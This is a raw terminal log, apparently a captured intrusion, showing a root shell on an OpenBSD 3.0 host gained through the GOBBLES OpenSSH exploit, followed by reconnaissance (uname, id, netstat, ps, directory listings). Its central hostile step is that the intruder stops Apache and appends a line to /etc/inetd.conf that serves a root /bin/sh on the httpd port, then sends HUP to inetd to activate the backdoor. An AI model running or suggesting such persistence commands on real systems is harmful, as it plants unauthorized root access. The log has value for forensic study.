SSH-1.99-OpenSSH_3.0
SSH-2.0-GOBBLES
GGGGO*GOBBLE*
uname -a;id
OpenBSD pufferfish 3.0 GENERIC#94 i386
uid=0(root) gid=0(wheel) groups=0(wheel)
netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp        0      0  192.168.3.100.22       Hacker1.64952          ESTABLISHED
tcp        1      0  192.168.3.100.22       Hacker1.64922          CLOSE_WAIT
tcp        0      0  *.1524                 *.*                    LISTEN
tcp        0      0  *.22                   *.*                    LISTEN
tcp        0      0  127.0.0.1.587          *.*                    LISTEN
tcp        0      0  127.0.0.1.25           *.*                    LISTEN
tcp        0      0  *.37                   *.*                    LISTEN
tcp        0      0  *.13                   *.*                    LISTEN
tcp        0      0  *.113                  *.*                    LISTEN
tcp        0      0  *.80                   *.*                    LISTEN
tcp        0      0  127.0.0.1.111          *.*                    LISTEN
tcp        0      0  *.111                  *.*                    LISTEN
udp        0      0  *.648                  *.*
udp        0      0  *.739                  *.*
udp        0      0  *.512                  *.*
udp        0      0  127.0.0.1.111          *.*
udp        0      0  *.514                  *.*
udp        0      0  *.111                  *.*
tcp6       0      0  *.22                   *.*                    LISTEN
tcp6       0      0  ::1.587                *.*                    LISTEN
tcp6       0      0  ::1.25                 *.*                    LISTEN
tcp6       0      0  *.37                   *.*                    LISTEN
tcp6       0      0  *.13                   *.*                    LISTEN
tcp6       0      0  *.113                  *.*                    LISTEN
udp6       0      0  *.512                  *.*
Active UNIX domain sockets
Address    Type   Recv-Q Send-Q Inode      Conn       Refs       Nextref    Addr
0xe0b0b700 dgram       0      0 0x0        0xe0a97040 0x0        0xe0af4300
0xe0afc000 dgram       0      0 0x0        0xe0a97040 0x0        0xe0af43c0
0xe0ae1f00 dgram       0      0 0x0        0xe0a97040 0x0        0xe0a58280
0xe0add800 dgram       0      0 0x0        0xe0a97040 0x0        0x0
0xe0ace500 dgram       0      0 0xefb43dd4 0x0        0xe0b09fc0 0x0        /dev/log
apachectl stop
/usr/sbin/apachectl stop: httpd stopped
echo "httpd stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf
ps -aux
USER       PID %CPU %MEM   VSZ   RSS TT   STAT STARTED       TIME COMMAND
root     17519  0.0  0.1   280   212 ??   R     3:20PM    0:00.00 ps -aux
root         1  0.0  0.1   332   200 ??   Is   Tue02PM    0:00.02 /sbin/init
root     25892  0.0  0.2   104   452 ??   Ss   Tue02PM    0:00.14 syslogd
root     13304  0.0  0.1    64   364 ??   Is   Tue02PM    0:00.00 portmap
root     10597  0.0  0.2    88   492 ??   Is   Tue02PM    0:00.02 inetd
root       212  0.0  0.5   836  1328 ??   Ss   Tue02PM    0:01.30 sendmail: acc
root     22389  0.0  0.4   332  1148 ??   Is   Tue02PM    0:00.54 /usr/sbin/ssh
root     11182  0.0  0.2   224   536 ??   Is   Tue02PM    0:00.32 cron
root     29118  0.0  0.2    44   428 C0   Is+  Tue02PM    0:00.00 /usr/libexec/
root     17521  0.0  0.2    44   428 C1   Is+  Tue02PM    0:00.00 /usr/libexec/
root       490  0.0  0.2    44   428 C2   Is+  Tue02PM    0:00.01 /usr/libexec/
root     17375  0.0  0.2    44   428 C3   Is+  Tue02PM    0:00.00 /usr/libexec/
root      4754  0.0  0.2    44   428 C5   Is+  Tue02PM    0:00.00 /usr/libexec/
megla    17905  0.0  0.4   452  1052 ??   Is    4:26PM    0:00.22 SCREEN (scree
megla    30640  0.0  0.5   828  1196 p1   Is+   4:26PM    0:00.04 /usr/bin/bash
megla    31648  0.0  0.5   828  1196 p2   Is+   4:26PM    0:00.05 /usr/bin/bash
root     29679  0.0  0.1   292   144 ??   S     3:04PM    0:00.06 ping 192.168.
root     17819  0.0  0.1   292   144 ??   S     3:11PM    0:00.02 ping 192.168.
root     10662  0.0  0.1   372   260 ??   S     3:16PM    0:00.22 //bin/sh
root     24147  0.0  0.0     0     0 ??   Z          -    0:00.00 (cron)
kill -HUP 10597
pwd
/
cd /usr/libexec
ls
afsd atrun auth comsat cpp cvs fingerd ftp-proxy ftpd getNAME getty hprop
hpropd identd ipropd-master ipropd-slave kadmind kauthd kdc kerberos kfd
kpasswdd kpropd ld.so lint1 lint2 locate.bigram locate.code locate.concatdb
locate.mklocatedb locate.updatedb lockspool lpr mail.local makekey makewhatis
nn ntalkd rexecd rlogind rpc.rquotad rpc.rstatd rpc.rusersd rpc.rwalld
rpc.sprayd rshd safe_finger sendmail sftp-server sm.bin smrsh smtpd smtpfwdd
tcpd telnetd tftpd uucpd vfontedpr vi.recover
cd ../bin
ls
Mail a2p addftinfo afmtodit afslog altqstat apply apropos ar arch as asa
asn1_compile at atq atrm aucat audioctl awk banner basename bash batch bc bdes
biff c++ c++filt c2ph cal calendar cap_mkdb captoinfo cc cdio checknr chflags
chfn chpass chsh ci cksum clear cmp co col colcrt colrm column comm compile_et
compress cpp crontab ctags cu cut cvs cvsbug dbmmanage dc deroff diff diff3
dirname dprofpp du egrep elf2olf encrypt env eqn error ex expand f77 false
fgen fgrep file file2c find find2perl finger flex flex++ fmt fold fpr from
fsplit fstat ftp g++ g77 gcc gcov gdb gencat getconf getopt gnubc gprof grep
grodvi groff grog grohtml grolj4 grops grotty groups gunzip gzcat gzexe gzip
h2ph h2xs head help hexdump hoststat hpftodit htdigest htpasswd id ident
indent indxbib info infocmp infotocap install install-info ipcrm ipcs join jot
kauth kdestroy kdump keynote kf kinit klist ktrace lam last lastcomm ld ldd
leave less lesskey lex lint lkbib lndir locate lock logger login logname look
lookbib lorder lpq lpr lprm lynx m4 machine mail mailq mailx make makeinfo man
merge mesg mg midiplay mixerctl mkdep mkstr mktemp modstat more mset msgs nawk
nc neqn netstat newaliases newsyslog nfsstat nice nm nohup nroff objdump od
oldrdist olf2elf otp-md4 otp-md5 otp-rmd160 otp-sha1 page pagesize pagsh
passwd paste patch pctr perl perl5.6.1 perlbug perlcc perldoc pfbtops pic
pl2pm pod2html pod2latex pod2man pod2text pod2usage podchecker podselect pr
printenv printf protoize psbb pstruct purgestat quota radioctl ranlib rcs
rcs2log rcsclean rcsdiff rcsfreeze rcsmerge rdist rdistd readlink refer renice
reset rev rlog rlogin rpcgen rpcinfo rs rsh rup ruptime rusers rwall rwho s2p
scp script sdiff sectok sed sendbug sftp shar showmount size skey skeyaudit
skeyinfo skeyinit skeyprune slogin soelim sort splain split ssh ssh-add
ssh-agent ssh-keygen ssh-keyscan string2key strings strip su sudo sum sup
systat tail talk tbl tcopy tee telnet texi2dvi texindex tfmtodit tftp tic time
tip tn3270 top touch tput tr troff true tset tsort tty ul uname uncompress
unexpand unifdef uniq units unprotoize unvis uptime usbhidctl users uudecode
uuencode vacation verify_krb5_conf vgrind vi view vis vmstat w wall wc what
whatis whereis which who whoami whois window write x99token xargs xstr yacc
yes ypcat ypmatch ypwhich yyfix zcat zcmp zdiff zegrep zfgrep zforce zgrep
zmore znew
ls *get
ls: *get: No such file or directory
echo $PATH
/usr/bin:/bin:/usr/sbin:/sbin:/usr/X11R6/bin:/usr/local/bin
ls /bin
[ cat chgrp chio chmod cp cpio csh date dd df domainname echo ed eject expr
hostname kill ksh ln ls md5 mkdir mt mv pax ps pwd rcp rksh rm rmail rmd160
rmdir sh sha1 sleep stty sync tar test
netstat -an
Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp        0      0  192.168.3.100.22       Hacker1.64952          ESTABLISHED
tcp        1      0  192.168.3.100.22       Hacker1.64922          CLOSE_WAIT
tcp        0      0  *.1524                 *.*                    LISTEN
tcp        0      0  *.22                   *.*                    LISTEN
tcp        0      0  127.0.0.1.587          *.*                    LISTEN
tcp        0      0  127.0.0.1.25           *.*                    LISTEN
tcp        0      0  *.37                   *.*                    LISTEN
tcp        0      0  *.13                   *.*                    LISTEN
tcp        0      0  *.113                  *.*                    LISTEN
tcp        0      0  127.0.0.1.111          *.*                    LISTEN
tcp        0      0  *.111                  *.*                    LISTEN
udp        0      0  *.648                  *.*
udp        0      0  *.739                  *.*
udp        0      0  *.512                  *.*
udp        0      0  127.0.0.1.111          *.*
udp        0      0  *.514                  *.*
udp        0      0  *.111                  *.*
tcp6       0      0  *.22                   *.*                    LISTEN
tcp6       0      0  ::1.587                *.*                    LISTEN
tcp6       0      0  ::1.25                 *.*                    LISTEN
tcp6       0      0  *.37                   *.*                    LISTEN
tcp6       0      0  *.13                   *.*                    LISTEN
tcp6       0      0  *.113                  *.*                    LISTEN
udp6       0      0  *.512                  *.*
Active UNIX domain sockets
Address    Type   Recv-Q Send-Q Inode      Conn       Refs       Nextref    Addr
0xe0b0b700 dgram       0      0 0x0        0xe0a97040 0x0        0xe0af4300
0xe0afc000 dgram       0      0 0x0        0xe0a97040 0x0        0xe0af43c0
0xe0ae1f00 dgram       0      0 0x0        0xe0a97040 0x0        0xe0a58280
0xe0af1200 dgram       0      0 0x0        0xe0a97040 0x0        0xe0b09fc0
0xe0add800 dgram       0      0 0x0        0xe0a97040 0x0        0x0
0xe0ace500 dgram       0      0 0xefb43dd4 0x0        0xe0b13a40 0x0        /dev/log